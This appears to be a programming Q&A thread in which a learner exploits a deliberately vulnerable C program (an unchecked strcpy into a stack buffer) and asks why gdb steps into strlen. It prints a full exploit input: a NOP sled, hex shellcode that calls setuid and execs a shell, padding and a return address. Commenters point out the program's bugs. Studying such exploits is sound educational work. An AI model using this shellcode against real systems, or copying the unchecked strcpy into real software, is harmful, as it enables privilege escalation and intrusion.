# basic buffer overflow with strcpy

Tags: c, buffer-overflow

I am reading here about basic buffer overflows: http://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html . I thought I understood what was happening so I made my own program:

```
//vulnerable1.c
#include <stdio.h>

#define MAX_DEGF_SIZE 720

int main(int argc, char* argv[])
{
    char degF[MAX_DEGF_SIZE];

    if (argc == 2 && strlen(argv[0]) < MAX_DEGF_SIZE) {
        strcpy(degF, argv[1]);
    } else {
        fprintf(stderr, "degF to degC converter\n");
        fprintf(stderr, "Usage: %s <degF>\n", argv[0]);

        return -1;
    }
}
```

Since the buffer size is 720, I tested how big the input would need to be.

```
./vulnerable1 `perl -e 'print "A"x728'`
AA...AAA degF is -17.8 degC

./vulnerable1 `perl -e 'print "A"x732'`
AA...AA degF is -17.8 degC
Segmentation fault
```

Here I see that I need at least 732 bytes. Next I disass main to see how many bytes have actually been reserved:

```
(gdb) disass main
Dump of assembler code for function main:
   0x08048514 <+0>: push   %ebp
   0x08048515 <+1>: mov    %esp,%ebp
   0x08048517 <+3>: and    $0xfffffff0,%esp
   0x0804851a <+6>: sub    $0x2f0,%esp
```

0x2f0 = 752. So the variable is padded by 20 bytes. Therefor, I need 756 bytes to start overwriting the saved ebp, and 760 bytes to to overwrite the return address. My stack breakdown is: 
`NOPS(704 bytes) + shellcode (32 bytes) + 'A's (20 bytes) + Return Address ( 4 bytes) = 760`

Now I try it out:

```
gdb -q vulnerable1
Reading symbols from /home/testUser/vulnerable1...done.
(gdb) break main
Breakpoint 1 at 0x8048520: file vulnerable1.c, line 11.
(gdb) r `perl -e 'print "\x90"x704, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80", "a"x20, "\xa0\xfb\xff\xbf"'`
Starting program: /home/testUser/vulnerable1 `perl -e 'print "\x90"x704, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80", "a"x20, "\xa0\xfb\xff\xbf"'`

Breakpoint 1, main (argc=2, argv=0xbffff564) at vulnerable1.c:11
11      if (argc == 2 && strlen(argv[0]) < MAX_DEGF_SIZE) {
(gdb) step
__strlen_sse2 () at ../sysdeps/i386/i686/multiarch/strlen.S:70
70  ../sysdeps/i386/i686/multiarch/strlen.S: No such file or directory.
    in ../sysdeps/i386/i686/multiarch/strlen.S
(gdb) step
73  in ../sysdeps/i386/i686/multiarch/strlen.S
```

What happens here?

Comment: You're using `strlen(argv[0])`, don't you mean `strlen(argv[1])`?

Comment: OP is trying to exploit a vulnerability in an example program. Yes, it has bugs, and intentionally so.

Comment: lets start with `argv[0]` is the name of the executable, not the first command line parameter.

Comment: since you do not have the source code for `strcpy()` visible to `gdb`, you should just `next` over that function call rather than trying to step through it.

Comment: the posted code is missing the statement: `#include <string.h>`

Comment: when I step through the posted code (with no corrections) I get the message:  *** stack smashing detected ***: /home/rkwill/Documents/forum/untitled2 terminated

Program received signal SIGABRT, Aborted.

Answer (score 1, accepted):

You're just stepping inside of `strlen`, which is apparently implemented in assembly and not in C (likely for performance).

Just keep stepping until you arrive back in `main`, or use `next` to step over the function call.

Comment: Or break on the strcpy call, with `break main.c:1234` (using the actual filename and line number instead of main.c and 1234)

Comment: If I just plain run it with these arguments I get ��...��1��ð̀1�Rhn/shh//bi��RS���B
          aaaaaaaaaaaaaaaaaaaa���� degF is -17.8 degC
Segmentation fault  for the ouput. But still the same user